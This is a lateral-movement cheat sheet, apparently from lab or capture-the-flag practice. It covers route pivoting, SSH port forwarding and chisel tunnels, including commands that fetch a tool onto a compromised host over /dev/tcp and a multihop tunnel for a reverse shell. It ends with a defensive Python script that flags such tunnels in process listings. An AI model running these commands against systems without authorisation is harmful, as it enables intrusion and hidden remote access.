# Lateral Movement

## Network Pivoting & Routing
Bring the interface up if it is administratively down:

```bash
sudo ip link set eth0 up
```

Check current routes before making changes. This shows which networks are reachable and through which gateways:

```bash
ip route show
```

Route traffic to a target network through a compromised host:

```bash
sudo ip route add 192.168.2.0/24 via 192.168.1.254
```

Remove a route when pivoting is complete, or to change routing paths and avoid routing conflicts:

```bash
sudo ip route del 192.168.2.0/24
```

Route all traffic through a specific gateway. Use this when you need to tunnel all connections through a compromised host acting as your proxy:

```bash
sudo ip route add default via 192.168.1.1
```

Use this when you have multiple paths to the same network and need to control which route is preferred. Lower metric = higher priority:

```bash
sudo ip route change 192.168.2.0/24 via 192.168.1.254 metric 200
```

## SSH Tunneling
### Dynamic Port Forwarding

Check that the proxy entry in `/etc/proxychains.conf` matches the port you pass to `-D`, open the SOCKS proxy, then run tools through it with proxychains:

```bash
tail /etc/proxychains.conf
ssh charix@10.10.10.84 -D 9050
proxychains vncviewer 127.0.0.1:5901 -passwd secret
```

### Local Port Forwarding

```bash
ssh -L PORT:localhost:PORT user@remotehost.com
ssh -L 8080:127.0.0.1:8080 -N -vv user@remotehost
```

### Remote Port Forwarding

```bash
ssh root@10.10.10.65 -R 4443:10.10.14.6:443
```

## chisel
Install chisel on the attacking host:

```bash
curl https://i.jpillora.com/chisel! | bash
```

Transfer chisel to a target. On the attacking host, serve the binary with netcat:

```bash
cp /usr/local/bin/chisel .
nc -lvnp 80 < chisel
```

Now on the remote host (use the `bash -c` form when the current shell is not bash):

```bash
cd /var/tmp
cat < /dev/tcp/10.10.14.172/80 > chisel
bash -c "cat < /dev/tcp/172.19.0.4/7011 > chisel"
chmod 755 /var/tmp/chisel
```

Create a tunnel: the server runs on the attacking host, the client on the target:

```bash
/usr/local/bin/chisel server -p 8002 -reverse -v
/var/tmp/chisel client 10.10.14.172:8002 R:127.0.0.1:8001:172.19.0.2:80
```

### Multihop tunnel for reverse shell
First start the new server on your attacking host:

```bash
/usr/local/bin/chisel server -p 5000 -reverse -v
```

Also set the listener:

```bash
nc -lvnp 9005
```

Now set the first hop:

```bash
/var/tmp/chisel client 10.10.14.172:5000 6010:127.0.0.1:5000
```

Finally set the second hop:

```bash
/var/tmp/chisel client 172.19.0.4:6010 7020:127.0.0.1:9005 &
```
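Seen from the blue-team side, every tunnel above leaves a recognisable command line on the pivot host. The following Python script is an added example (not part of the original cheat sheet): it parses a constructed `ps -eo pid,user,args` listing and flags the patterns shown on this page, namely `ssh -D/-L/-R`, `chisel server -reverse` and `chisel client ... R:...`. The process listing is constructed, and the chisel parsing assumes no options sit between `client` and the server address.

```python
import shlex

# Constructed sample of `ps -eo pid,user,args` output (not captured from a real host).
SAMPLE_PS = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 1532 www-data ssh charix@10.10.10.84 -D 9050
 1610 www-data ssh -L 8080:127.0.0.1:8080 -N -vv user@remotehost
 1644 root     ssh root@10.10.10.65 -R 4443:10.10.14.6:443
 1702 www-data /var/tmp/chisel client 10.10.14.172:8002 R:127.0.0.1:8001:172.19.0.2:80
 1750 root     /usr/local/bin/chisel server -p 8002 -reverse -v
 1790 alice    vim /etc/hosts
"""

# ssh client forwarding flags. sshd's -D means "do not daemonize", so only `ssh` is matched.
SSH_FLAGS = {"-D": "dynamic (SOCKS) forward", "-L": "local forward", "-R": "remote (reverse) forward"}

def parse_ps(text):
    """Yield (pid, user, argv) per process line, skipping the header."""
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            yield int(parts[0]), parts[1], shlex.split(parts[2])

def classify(argv):
    """Return a short finding for tunnel-like command lines, else None."""
    prog = argv[0].rsplit("/", 1)[-1] if argv else ""
    if prog == "ssh":
        for i, arg in enumerate(argv[1:], 1):
            for flag, desc in SSH_FLAGS.items():
                if arg == flag and i + 1 < len(argv):      # "-D 9050"
                    return f"ssh {desc}: {argv[i + 1]}"
                if arg.startswith(flag) and len(arg) > 2:  # "-D9050"
                    return f"ssh {desc}: {arg[2:]}"
    elif prog == "chisel":
        if "server" in argv and "-reverse" in argv:
            return "chisel server accepting reverse tunnels"
        if "client" in argv:
            # Assumption: no options between "client" and the server address.
            remotes = argv[argv.index("client") + 2:]
            kind = "reverse" if any(r.startswith("R:") for r in remotes) else "forward"
            return f"chisel client {kind} tunnel: {' '.join(remotes)}"
    return None

def find_tunnel_indicators(ps_text):
    """Return [(pid, user, finding)] for every process that looks like a tunnel."""
    rows = ((pid, user, classify(argv)) for pid, user, argv in parse_ps(ps_text))
    return [(pid, user, f) for pid, user, f in rows if f]
```

Run `find_tunnel_indicators(SAMPLE_PS)` to get five findings from the sample; `sshd -D` and `vim` are correctly ignored.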